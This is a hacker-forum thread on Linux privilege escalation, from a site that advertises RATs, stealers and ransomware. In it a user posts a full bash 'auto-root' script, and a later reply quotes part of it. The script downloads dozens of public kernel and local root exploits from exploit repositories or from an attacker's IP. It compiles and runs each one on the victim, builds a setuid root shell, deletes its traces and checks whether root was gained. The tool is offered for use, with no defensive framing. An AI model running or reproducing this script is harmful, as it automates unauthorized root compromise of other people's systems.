Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

 

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware,, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      D4rkn3S

      linux privilege escalation commands

      Started by D4rkn3S,

      7 posts in this topic

      D4rkn3S    822

      D4rkn3S
      Posted

      hello guys, there is commands and cheat sheet which need at privilege escalation phase

       

      Hidden Content

        Give reaction to this post to see the hidden content.

      • Like 5
      • Thanks 3
      • Haha 1

      Share this post

      Link to post
      Share on other sites

      bash818    187

      bash818
      Posted

      Windows

      Hidden Content

        Give reaction to this post to see the hidden content.

      Linux

      Hidden Content

        Give reaction to this post to see the hidden content.

      • Like 1

      Share this post

      Link to post
      Share on other sites

      D4rkn3S    822

      D4rkn3S
      Posted
      23 hours ago, bash818 said:

      Windows

      Hidden Content

        Give reaction to this post to see the hidden content.

      Linux

      Hidden Content

        Give reaction to this post to see the hidden content.

      nice scripts LARA.sh bash818, but when i checked, there  links not worked in this script, i modified it and here is working bash script

       

      Spoiler

      #!/bin/bash

      bold=`tput bold`
      normal=`tput sgr0`
      red='\e[0;31m'
      yellow='\e[1;33m'
      blue='\e[1;34m'
      light_green='\e[1;32m'
      light_cyan='\e[1;36m'
      cyan='\e[0;36m'
      red='\e[0;31m'
      light_red='\e[1;31m'
      brown='\e[0;33m'
      no_color='\e[0m'

      #com_url='$gaddress/linux/local'
      #x86_64_url='$gaddress/lin_x86-64/local'
      #x86_url='$gaddress/lin_x86/local'
      #sploits_url='$saddress/sploits'

      function lauto_root(){

          echo -e "\n${light_green}${bold}###################################################"
          echo -e "${light_green}${bold}#            ${light_red}Local Auto-Root Exploiter            ${light_green}#"
          echo -e "${light_green}${bold}#               By ${light_red}Enigma Dimitri                 ${light_green}#"
          echo -e "${light_green}${bold}#           ${yellow}Inspired by Auto Root Exploit         ${light_green}#"
          echo -e "${light_green}${bold}#               By Nilotpal Biswas                #"
          echo -e "${light_green}${bold}###################################################"
      }    

      function desc(){

          echo -e "\n${light_red}${bold}Usage: ${yellow}$0 [${light_green}option${yellow}]\n"
          echo -e "${light_red}${bold}Options: ${no_color}\n"
          echo -e "${bold}${yellow} -a  or --arsenal: ${light_green} Downloads the exploits to /var/www/html directory and start the apache server."
          echo -e "${bold}${yellow} -l <Attacker-IP>  or --Lroot <Attacker-IP>: ${light_green} Get the exploits from attackers machine and starts the exploiter."
          echo -e "${bold}${yellow} -r  or --Rroot: ${light_green} Downloads the exploits directly to the server and starts the exploiter.\n"
          echo -e "${bold}${light_red}Command Examples: \n"
          echo -e "${light_red}Create Local Arsenal: ${yellow}$0 -a"
          echo -e "${light_red}LAN Root: ${yellow}$0 -l 10.10.10.123"
          echo -e "${light_red}Remote Root: ${yellow}$0 -r \n"
      }

      function local_dir(){

          sudo rm -r /var/www/html/exploits
          # Creating the required Directories
          sudo mkdir /var/www/html/exploits
          sudo mkdir /var/www/html/exploits/gitex
          sudo mkdir /var/www/html/exploits/linux
          sudo mkdir /var/www/html/exploits/linux/local
          sudo mkdir /var/www/html/exploits/linux_x86-64
          sudo mkdir /var/www/html/exploits/linux_x86-64/local
          sudo mkdir /var/www/html/exploits/linux_x86
          sudo mkdir /var/www/html/exploits/linux_x86/local
          sudo mkdir /var/www/html/exploits/sploits
      }

      function arsenal(){

          # Getting the common exploits to local directory
          cd /var/www/html/exploits/linux/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux/local/2031.c 
          sudo wget --no-check-certificate $gaddress/linux/local/17391.c 
          sudo wget --no-check-certificate $gaddress/linux/local/18411.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33321.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35161.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5092.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8572.c  
          sudo wget --no-check-certificate $gaddress/linux/local/25202.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33322.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40812.c 
          sudo wget --no-check-certificate $gaddress/linux/local/37292.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2013.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5093.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8673.c 
          sudo wget --no-check-certificate $gaddress/linux/local/10613.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40003.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2004.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15704.c 
          sudo wget --no-check-certificate $gaddress/linux/local/25444.c 
          sudo wget --no-check-certificate $gaddress/linux/local/30604.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33824.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41994.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2005.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15285.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41995.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2006.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40616.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33336.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39166.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41886.c 
          sudo wget --no-check-certificate $gaddress/linux/local/1397.c 
          sudo wget --no-check-certificate $gaddress/linux/local/27297.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39277.c 
          sudo wget --no-check-certificate $gaddress/linux/local/718.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8678.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41458.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40839.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35370.c 
          sudo wget --no-check-certificate $gaddress/linux/local/38390.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39230.c
          sudo wget --no-check-certificate $gaddress/linux/local/42183.c

          #bash exploits
          sudo wget --no-check-certificate $gaddress/linux/local/2011.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/8478.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/10018.sh 

          #python exploits
          sudo wget --no-check-certificate $gaddress/linux/local/9844.py 
          sudo wget --no-check-certificate $gaddress/linux/local/12130.py 

          # Getting 64bit only exploits to lin_x86-64 directory
          cd /var/www/html/exploits/lin_x86-64/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

          # Getting 32-bit only exploit to lin_x86 directory
          cd /var/www/html/exploits/lin_x86/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

          # Getting the compressed exploits to sploits directory
          cd /var/www/html/exploits/sploits

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
          sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

          # Getting CVE-2016-2384 exploit to gitex directory 
          cd /var/www/html/exploits/gitex

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gitaddress/poc.c
          sudo wget --no-check-certificate $gitaddress/poc.py
      }

      function valid_ip()
      {
          if ! [ "$2" ]; then
              echo -e "${red}${bold}IP Not Provided, Please provide an IP"
          else
              if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

                  for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
                  do
                    (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
                  done
              else
                  echo -e "${light_green}========================================"
                  echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
                  echo -e "========================================"
                  exit 1;
              fi
          fi
      }

      #gaddress=$1'/exploits'
      #saddress=$1'/exploits'
      #gitaddress=$1'/exploits/gitex'
      function exploiter(){

          checkroot() {
              if [ $(id -u) == 0 ]; then
              echo
              echo -e "${light_red}Successfully R00T(ed).. have fun :)"
              id=$(id)
              echo -e "${light_red}ID     => ${light_green}" $id
              who=$(whoami)
              echo -e "${light_red}WHOAMI => ${light_green}" $who
              exit
              else
              echo ""
              echo -e "${light_red}R00Ting.. ${light_green}"
              sleep 1
              fi
          }
          ccmpl(){
              gcc exploit.c -o exploit -lutil -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -m32 -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lkeyutils -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -pthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -static -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -fPIC -shared -o exploit exploit.c -ldl -w
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -O2 exploit.c
              gcc -O2 -fomit-frame-pointer exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c -static -O2
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -pthread exploit.c -o exploit -lcrypt
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -m64 -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
          }
          shcmpl(){
              bash exploit.sh
              rm exploit.sh
              rm *.c
              checkroot;
          }
          pycmpl(){
              python exploit.py
              rm exploit.py
              rm *.c
              checkroot;
          }
          echo -e "${light_red}Auto R00Ting started...${light_green}"

          checkroot;
          #c
          wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
          ccmpl;

          #sh
          wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
          shcmpl;

          #py
          wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
          pycmpl;
          wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
          pycmpl;

          #txt
          #platforms/linux/local/9191.txt
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/39772.txt
          wget --no-check-certificate $saddress/bin-sploits/39772.zip
          cd 39772
          unzip 39772.zip
          tar -xf exploit.tar
          cd ebpf_mapfd_doubleput_exploit
          bash compile.sh
          ./hello
          ./doubleput
          ./suidhelper
          cd ..
          rm -rf ebpf_mapfd_doubleput_exploit
          rm -rf exploit.tar
          checkroot;
          tar -xf crasher.tar
          cd ebpf_mapfd_doubleput_crasher
          bash compile.sh
          ./doubleput
          cd ..
          rm -rf ebpf_mapfd_doubleput_crasher
          rm -rf 39772
          rm -rf 39772.zip
          checkroot;
          #platforms/linux/local/23674.txt
          smbmount --version
          ls -l /usr/bin/smbmount
          ls -l /usr/bin/smbmnt
          echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
          make a
          cc a.c -o a
          chmod +s a
          share:/etc/samba/smb.conf
          /etc/samba/smb.conf
          [share]
          path = /data/share
          writable = no
          locking = no
          public = yes
          guest ok = yes
          comment = Share
          ls -l a
          ls -l pokus/a
          id
          checkroot;
          #platforms/linux/local/29714.txt
          wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          tar -zxf 29714.tgz
          cd exploit
          make
          make install
          cd ..
          rm -rf exploit
          rm -rf 29714.tgz
          checkroot;
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/33395.txt
          wget $saddress/bin-sploits/33395.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          checkroot;
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          #platforms/linux/local/40489.txt
          wget --no-check-certificate $saddress/bin-sploits/40489.zip
          unzip 40489.zip
          cd 40489
          bash compile.sh
          ./pwn
          ./enjoy
          cd ..
          rm -rf 40489
          rm -rf 40489.zip
          checkroot;
          #platforms/linux/local/41770.txt
          # #!/bin/bash
          # (./ProcReadHelper /proc/$$/syscall) &
          # sleep 1
          # exec /usr/bin/passwd
          # #!/bin/bash
          # echo "Current pid is $$"
          # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
          # sleep 5
          # exec /usr/bin/passwd
          # static ssize_t mem_read(struct file * file, char __user * buf,
          #                         size_t count, loff_t *ppos) {
          #     if (file->private_data != (void*)((long)current->self_exec_id))
          #         goto out_put;
          # #!/bin/bash
          # (sleep 3; echo 15) > /proc/$$/oom_adj &
          # exec /usr/bin/passwd
          # checkroot;
          #platforms/linux/local/38559.txt
          rmmod b43
          modprobe b43 fwpostfix=AA%xBB
          dmesg
          checkroot;
          #platforms/linux/local/41999.txt
          wget --no-check-certificate $gitaddress/poc.c -O poc.c
          gcc poc.c -masm=intel
          ./a.out 0
          checkroot;
          ./a.out 1
          checkroot;
          ./a.out 2
          checkroot;
          ./a.out 3
          checkroot;
          ./a.out 4
          checkroot;
          ./a.out 5
          checkroot;
          ./a.out 6
          checkroot;
          ./a.out 7
          checkroot;
          ./a.out 8
          checkroot;
          ./a.out 9
          checkroot;
          ./a.out 10
          checkroot;
          rm a.out
          rm poc.c
          wget --no-check-certificate $gitaddress/poc.py -O poc.py
          python poc.py
          checkroot;
          rm poc.py
          rm a.out
          rm exploit
          
          echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
          exit 1;
      }


      if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
          lauto_root
          desc
      fi

      if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
          lauto_root
          sleep 2 
          echo -e "\n${light_green}=================================="
          echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
          echo -e "==================================\n"
          # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
          local_dir
          arsenal
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
          echo -e "==========================\n"
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
          echo -e "==========================\n"
          /bin/bash -i /etc/init.d/apache2 start
          /bin/bash -i /etc/init.d/apache2 status
          echo -e "${light_green}=================================="
          echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
          echo -e "==================================\n"

          exit 1;
      fi 

      if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
          lauto_root
          if ! [ "$2" ]; then
              echo -e "\n${light_red}No IP address provided!!!\n"
              exit 1;
          else     
              ip=$2
          fi

          if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

              for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
              do
                (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
              done
          else
              echo -e "${light_green}========================================"
              echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
              echo -e "========================================\n"
          fi    

          sleep 2 
          echo -e "${light_green}=================================="
          echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
          echo -e "==================================\n"
          gaddress='http://'${ip}'/exploits'
          saddress='http://'${ip}'/exploits'
          gitaddress='http://'${ip}'/exploits/gitex'
          exploiter
          exit 1;
      fi

      if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
          lauto_root
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          sleep 2 
          echo -e "${light_green}==================================="
          echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
          echo -e "===================================\n"
          exploiter
          exit 1;
      fi


       

      thanks for share

      • Like 1

      Share this post

      Link to post
      Share on other sites

      bash818    187

      bash818
      Posted (edited)
      hace 8 horas, D4rkn3S dijo:

      nice scripts LARA.sh bash818, but when i checked, there  links not worked in this script, i modified it and here is working bash script

       

        Reveal hidden contents

      #!/bin/bash

      bold=`tput bold`
      normal=`tput sgr0`
      red='\e[0;31m'
      yellow='\e[1;33m'
      blue='\e[1;34m'
      light_green='\e[1;32m'
      light_cyan='\e[1;36m'
      cyan='\e[0;36m'
      red='\e[0;31m'
      light_red='\e[1;31m'
      brown='\e[0;33m'
      no_color='\e[0m'

      #com_url='$gaddress/linux/local'
      #x86_64_url='$gaddress/lin_x86-64/local'
      #x86_url='$gaddress/lin_x86/local'
      #sploits_url='$saddress/sploits'

      function lauto_root(){

          echo -e "\n${light_green}${bold}###################################################"
          echo -e "${light_green}${bold}#            ${light_red}Local Auto-Root Exploiter            ${light_green}#"
          echo -e "${light_green}${bold}#               By ${light_red}Enigma Dimitri                 ${light_green}#"
          echo -e "${light_green}${bold}#           ${yellow}Inspired by Auto Root Exploit         ${light_green}#"
          echo -e "${light_green}${bold}#               By Nilotpal Biswas                #"
          echo -e "${light_green}${bold}###################################################"
      }    

      function desc(){

          echo -e "\n${light_red}${bold}Usage: ${yellow}$0 [${light_green}option${yellow}]\n"
          echo -e "${light_red}${bold}Options: ${no_color}\n"
          echo -e "${bold}${yellow} -a  or --arsenal: ${light_green} Downloads the exploits to /var/www/html directory and start the apache server."
          echo -e "${bold}${yellow} -l <Attacker-IP>  or --Lroot <Attacker-IP>: ${light_green} Get the exploits from attackers machine and starts the exploiter."
          echo -e "${bold}${yellow} -r  or --Rroot: ${light_green} Downloads the exploits directly to the server and starts the exploiter.\n"
          echo -e "${bold}${light_red}Command Examples: \n"
          echo -e "${light_red}Create Local Arsenal: ${yellow}$0 -a"
          echo -e "${light_red}LAN Root: ${yellow}$0 -l 10.10.10.123"
          echo -e "${light_red}Remote Root: ${yellow}$0 -r \n"
      }

      function local_dir(){

          sudo rm -r /var/www/html/exploits
          # Creating the required Directories
          sudo mkdir /var/www/html/exploits
          sudo mkdir /var/www/html/exploits/gitex
          sudo mkdir /var/www/html/exploits/linux
          sudo mkdir /var/www/html/exploits/linux/local
          sudo mkdir /var/www/html/exploits/linux_x86-64
          sudo mkdir /var/www/html/exploits/linux_x86-64/local
          sudo mkdir /var/www/html/exploits/linux_x86
          sudo mkdir /var/www/html/exploits/linux_x86/local
          sudo mkdir /var/www/html/exploits/sploits
      }

      function arsenal(){

          # Getting the common exploits to local directory
          cd /var/www/html/exploits/linux/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux/local/2031.c 
          sudo wget --no-check-certificate $gaddress/linux/local/17391.c 
          sudo wget --no-check-certificate $gaddress/linux/local/18411.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33321.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35161.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5092.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8572.c  
          sudo wget --no-check-certificate $gaddress/linux/local/25202.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33322.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40812.c 
          sudo wget --no-check-certificate $gaddress/linux/local/37292.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2013.c 
          sudo wget --no-check-certificate $gaddress/linux/local/5093.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8673.c 
          sudo wget --no-check-certificate $gaddress/linux/local/10613.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40003.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2004.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15704.c 
          sudo wget --no-check-certificate $gaddress/linux/local/25444.c 
          sudo wget --no-check-certificate $gaddress/linux/local/30604.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33824.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41994.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2005.c 
          sudo wget --no-check-certificate $gaddress/linux/local/15285.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41995.c 
          sudo wget --no-check-certificate $gaddress/linux/local/2006.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40616.c 
          sudo wget --no-check-certificate $gaddress/linux/local/33336.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39166.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41886.c 
          sudo wget --no-check-certificate $gaddress/linux/local/1397.c 
          sudo wget --no-check-certificate $gaddress/linux/local/27297.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39277.c 
          sudo wget --no-check-certificate $gaddress/linux/local/718.c 
          sudo wget --no-check-certificate $gaddress/linux/local/8678.c 
          sudo wget --no-check-certificate $gaddress/linux/local/41458.c 
          sudo wget --no-check-certificate $gaddress/linux/local/40839.c 
          sudo wget --no-check-certificate $gaddress/linux/local/35370.c 
          sudo wget --no-check-certificate $gaddress/linux/local/38390.c 
          sudo wget --no-check-certificate $gaddress/linux/local/39230.c
          sudo wget --no-check-certificate $gaddress/linux/local/42183.c

          #bash exploits
          sudo wget --no-check-certificate $gaddress/linux/local/2011.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/8478.sh 
          sudo wget --no-check-certificate $gaddress/linux/local/10018.sh 

          #python exploits
          sudo wget --no-check-certificate $gaddress/linux/local/9844.py 
          sudo wget --no-check-certificate $gaddress/linux/local/12130.py 

          # Getting 64bit only exploits to lin_x86-64 directory
          cd /var/www/html/exploits/lin_x86-64/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

